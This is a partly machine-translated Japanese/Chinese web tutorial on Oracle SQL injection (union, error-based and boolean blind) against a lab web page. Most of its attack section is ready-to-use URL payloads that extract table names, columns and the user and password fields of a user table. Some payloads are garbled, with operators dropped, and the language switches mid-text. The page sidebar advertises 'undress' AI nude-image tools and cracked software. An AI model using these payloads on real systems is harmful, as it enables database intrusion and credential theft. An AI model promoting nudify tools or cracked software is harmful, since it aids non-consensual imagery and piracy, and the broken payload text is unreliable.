この記事では、インジェクションの基本手順やエラー報告など、Oracle インジェクションに関する関連知識を提供します。皆様のお役に立てれば幸いです。
1. length() の使用法:
length(char): return文字列の長さ。2. COUNT(*) 使用法:
COUNT(*) 関数は、指定された選択範囲で選択された行の数を返します。3. ascii() の使用法:
ascii(char) は、文字を ASCII コードに変換することを意味します。4. SUBSTR の使用法:
SUBSTR(ソース文字列, 検索開始位置, [長さ]) 戻り値は、ソース文字列内の指定された開始位置と、文字列の長さ。5. INSTR の使用法:
INSTR (ソース文字列、検索する文字列、どの文字から始まり、どの一致するシーケンス番号を検索するか) は、見つかった位置を返します。見つからない場合は 0 デフォルトの検索順序は左から右です。開始位置が負の数の場合、右から検索が開始されます。開始位置が 0 の場合、戻り値は 0 です。 また、以降の記事で使用する際に説明する機能もあります。 2. 各基本インジェクション タイプの基本手順
環境は、システムとして win2003 を使用する VMware 上の jsp Oracle の単純な Web ページです。 1.oracle ジョイント クエリ インジェクション
1.インジェクション ポイントを見つける
この手順は、私の実験環境では明らかですが、実際の環境では基本的な手順は、データベースと対話する入力ボックスを見つけ、入力ボックスのデータ型とそのデータの終了方法を決定し、いくつかの判断ステートメントを追加することです。注射があるかどうかを確認します。
http://10.1.5.34:8080/SqlInjection/selcet?sname=1' or 1=2 --
http://10.1.5.34:8080/SqlInjection/selcet?sname=1' and 1=2 --さまざまなペイロードを構築してデータを手動で追加した後、URL にインジェクションの脆弱性があることがわかりました。入力ペイロードはその効果を達成しました。
3. 列数の決定
Oracle データベースは、クエリ データ テーブルの列数を決定するために order by も使用します。Order by は次の列である必要があります。 select -list 式 実際の環境では、テーブルの列数が多くなる場合があるため、列数を判断する際には二分法を使用するのが最善です。
http://10.1.5.34:8080/SqlInjection/selcet?sname=1' order by 3 --3 で並べるとページは正常ですが、4 で並べるとエラーが発生するため、クエリ テーブルの列数は 3
になります。
4.Oracle联合查询
跟之前的学习的MySQL以及SQL server一样,Oracle同样通过union 来实现联合查询注入,并且不用跟SQL server联合查询注入一样添加all,仅只用union就行,但是依旧要跟SQL server联合查询注入一样判断后续各列的数据类型。
接下里我们首先查看回显位
http://10.1.5.34:8080/SqlInjection/selcet? union select null,null,null from dual --
因为在Oracle数据库中的select查询语句必须跟上查询列表,所以在union后面的select查询语句我们必须跟上from dual ,dual表是Oracle数据库中自带的虚拟表,可当万能用。
我们看到三个列全部会回显在页面上
下面我们还要通过更改null判断各个回显位的数据类型
http://10.1.5.34:8080/SqlInjection/selcet? union select '1',null,null from dual --
判断出1号位的数据类型位字符型,接下来我们就可以通过构造不同的payload替换'1',来查询到我们想要的数据
select user from dual 获取用户名
http://10.1.5.34:8080/SqlInjection/selcet? union select user,null,null from dual --
select banner from sys.v_$version where rownum=1 获取版本
http://10.1.5.34:8080/SqlInjection/selcet? union select banner,null,null from sys.v_$version where rownum=1 --
借助联合查询和默认表 user_tables获取当前数据库所有表名(第一行的)。
http://10.1.5.34:8080/SqlInjection/selcet?sname=1' union select table_name,null,null from user_tables where rownum=1--
查看下一行表名
http://10.1.5.34:8080/SqlInjection/selcet?sname=1' union select table_name,null,null from user_tables where rownum=1 and table_name'T_USER'--
没有其他的表,只有T_USER
如果可以显示多行数据,则可以通过以下代码查看到T-USER所有的列名,不能就只能通过跟上面类似的方法 用“”添加附加条件,去除已经查看到的数据然后查看下一行数据
http://10.1.5.34:8080/SqlInjection/selcet?sname=1' union select column_name,null,null from user_tab_columns where table_name='T_USER'--
获取T_USER表中字段为SNAME、SUSER、SPWD,然后获得他们的值
因为之前判断过1,2,3号位都回显,且都为字符型,所以下面一次性查询,如果只有一个也可以一个一个的查询
10.1.5.34:8080/SqlInjection/selcet?sname=1' union select SNAME,SUSER,SPWD from T_USER--
获取数据
因为靶场比较简陋,所以实验过程只是体现自己的注入思路,并不代表T_USER表中的东西就是后台账号之内的敏感数据,真实环境中,你查询的数据可以是任何你能查询到数据。
2.Oracle报错注入
1.寻找注入点
当你发现你找到的注入点在输入错误数据会反弹数据库原始报错信息时,我们就可以使用报错注入。然后前面的步骤基本一致,都是先找注入点,然后分析闭合方式。
2.报错注入
Oracle报错注入——类型转换错误和报错函数。
payload:1=utl_inaddr.get_host_name((SQL语句))
查询结果: ORA-29257: 未知的主机 结果
10.1.5.34:8080/SqlInjection/selcet?sname=1' and 1=utl_inaddr.get_host_name((select table_name from user_tables where rownum=1)) --
T_USER即我们想要查询的表名,如果不止一个也可以通过上面联合查询注入中提到的方法,在sql语句中添加附加''条件遍历表名。
跟联合查询用到的相同的语句查到接下来的列名,数据
下面我们可以用到一个函数来改变之前遍历每个数据的麻烦:sys.stragg()在单行中获取所有行信息。
10.1.5.34:8080/SqlInjection/selcet?sname=1' and 1=utl_inaddr.get_host_name((select sys.stragg('~'||SUSER||'~') from T_USER))--
||是Oracle中的字符拼接符号,在以上payload使用的时候需要将其更改为%7C%7C,即它的url编码。
我们通过拼接其他符号以及sys,stragg()函数使我们能够清晰的分辨数据表中这个字段每一行的数据,在之前的联合查询注入同样可以使用到这个函数,省去遍历的麻烦
3.Oracle布尔盲注
1.寻找注入点
使用条件:HTTP返回包中没有执行结果的数据和报错信息。
当你发出你构造的payload时,页面并没有产生变化,即说明你的payload正确。
跟上面两种注入一样寻找注入点。
Oracle盲注核心——字符串截取函数、ascii转换函数、条件判断语句。
要注意的是在截断函数中长度是包含开始截取位置那一位的。
2.Oracle布尔盲注
步骤跟之前的顺序是一致的 拿表名-列名-数据,这里就不一一列举了,主要说重点。
我们在拿一个数据时,比如说表名,我们需要先判断他的长度
10.1.5.34:8080/SqlInjection/selcet?suser=&sname=1' and (select length(table_name) from user_tables where rownum=1)=6--
我们可以先将=改为>或者
http://10.1.5.34:8080/SqlInjection/selcet?sname=1' and (select ascii(substr(table_name,1,1)) from user_tables where rownum=1)=84--
然后就用截取函数 先截取表名的第一个字符,然后转译为ascii码,同样可以通过>或者
如果会使用burpsuit的话,可以通过burpsuit暴力破解,设置截取位置以及等于号后面的数字来跑出表名。
所有数据均可使用同样的方法获取
推荐教程:《Oracle教程》
以上がOracle インジェクションの細部を完全にマスターするためのステップバイステップの指導の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。
Oracleのコア機能:データベースソリューションの提供Apr 25, 2025 am 12:06 AMOracle Databaseは、データセキュリティと高可用性を提供するためにSQLおよびオブジェクトリレーショナルモデルをサポートするリレーショナルデータベース管理システムです。 1. Oracleデータベースのコア関数には、データストレージ、検索、セキュリティ、バックアップ、リカバリが含まれます。 2。その作業原則には、多層貯蔵構造、MVCCメカニズム、およびオプティマイザーが含まれます。 3.基本的な使用には、テーブルの作成、データの挿入、クエリが含まれます。高度な使用には、ストアドプロシージャとトリガーが含まれます。 4.パフォーマンス最適化戦略には、インデックスの使用、最適化されたSQLステートメント、およびメモリ管理が含まれます。
Oracleソフトウェアの使用:データベース管理などApr 24, 2025 am 12:18 AMデータベース管理に加えて、OracleソフトウェアはJavaeeアプリケーション、データグリッド、高性能コンピューティングでも使用されています。 1. OracleWeblogicserverは、Javaeeアプリケーションの展開と管理に使用されます。 2。OracleCoherenceは、高性能データストレージとキャッシュサービスを提供します。 3. OracleExadataは、高性能コンピューティングに使用されます。これらのツールにより、OracleはエンタープライズITアーキテクチャでより多様な役割を果たすことができます。
ビジネスの世界におけるオラクルの役割Apr 23, 2025 am 12:01 AMOracleはデータベース会社だけでなく、クラウドコンピューティングとERPシステムのリーダーでもあります。 1。Oracleは、データベースからクラウドサービスおよびERPシステムへの包括的なソリューションを提供します。 2。Oraclecloudは、AWSとAzureに挑戦し、IAAS、PAAS、SAASサービスを提供します。 3. e-businesssuiteやfusionApplicationsなどのOracleのERPシステムは、企業がオペレーションを最適化するのに役立ちます。
Oracle Software in Action:実際の例Apr 22, 2025 am 12:12 AM現実世界のOracleソフトウェアアプリケーションには、eコマースプラットフォームと製造が含まれます。 1)eコマースプラットフォームでは、OracLedatabaseを使用してユーザー情報を保存および照会します。 2)製造では、Oraclee-BusinessSuiteを使用して、在庫と生産計画を最適化します。
Oracleソフトウェア:アプリケーションと業界Apr 21, 2025 am 12:01 AMOracleソフトウェアが複数のフィールドに輝く理由は、その強力なアプリケーションとカスタマイズされたソリューションです。 1)Oracleは、データベース管理からERP、CRM、SCM、2)包括的なソリューションを提供します。そのソリューションは、金融、医療、製造などの業界特性に従ってカスタマイズできます。
MySQLとOracleの選択:意思決定ガイドApr 20, 2025 am 12:02 AMMySQLまたはOracleの選択は、プロジェクトの要件に依存します。1。MySQLは、オープンソース、無料、使いやすさのため、中小規模のアプリケーションやインターネットプロジェクトに適しています。 2。Oracleは、その強力で安定した高度な機能のため、大企業のコアビジネスシステムに適していますが、高コストです。
Oracleの製品:深いダイビングApr 19, 2025 am 12:14 AMOracleの製品エコシステムには、データベース、ミドルウェア、クラウドサービスが含まれます。 1。OracLedatabaseはそのコア製品であり、効率的なデータストレージと管理をサポートしています。 2。OracleWeblogicserverなどのミドルウェアは、さまざまなシステムに接続します。 3。OracleCloudは、クラウドコンピューティングソリューションの完全なセットを提供します。
MySQLとOracle:機能と機能の重要な違いApr 18, 2025 am 12:15 AMMySQLとOracleには、パフォーマンス、スケーラビリティ、セキュリティに利点があります。 1)パフォーマンス:MySQLは読み取り操作と高い並行性に適しており、Oracleは複雑なクエリとビッグデータ処理に優れています。 2)スケーラビリティ:MySQLはマスタースレーブの複製とシャードを通じて拡張され、OracleはRACを使用して高可用性と負荷分散を提供します。 3)セキュリティ:MySQLはきめ細かい許可制御を提供しますが、Oracleにはより包括的なセキュリティ機能と自動化ツールがあります。
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
Video Face Swap
完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。
人気の記事
ホットツール
EditPlus 中国語クラック版
サイズが小さく、構文の強調表示、コード プロンプト機能はサポートされていません
Dreamweaver Mac版
ビジュアル Web 開発ツール
メモ帳++7.3.1
使いやすく無料のコードエディター
MantisBT
Mantis は、製品の欠陥追跡を支援するために設計された、導入が簡単な Web ベースの欠陥追跡ツールです。 PHP、MySQL、Web サーバーが必要です。デモおよびホスティング サービスをチェックしてください。
ドリームウィーバー CS6
ビジュアル Web 開発ツール
ホットトピック
7700
15164014139352128725123029